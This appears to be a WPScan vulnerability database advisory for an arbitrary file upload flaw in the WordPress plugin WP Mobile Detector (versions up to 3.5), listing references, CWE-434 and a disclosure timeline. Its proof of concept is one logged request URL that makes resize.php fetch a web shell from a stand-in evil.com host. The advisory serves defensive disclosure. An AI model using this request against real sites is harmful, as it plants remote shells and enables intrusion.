WP Mobile Detector <= 3.5 - Arbitrary File Upload



Proof of Concept
As seen in access logs:
http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=https://www.evil.com/shell.php

Affects Plugin

fixed in version 3.6
- plugin closed

References

URL https://blog.sucuri.net/2016/06/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html
URL https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/
URL https://wordpress.org/plugins/wp-mobile-detector/changelog/

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter firefart
Submitter Website https://firefart.at/
Submitter Twitter _FireFart_
Views 7058
Verified No
WPVDB ID 8505

Timeline

Publicly Published 2016-06-03 (about 4 years ago)
Added 2016-06-03 (about 4 years ago)
Last Updated 2019-11-01 (8 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin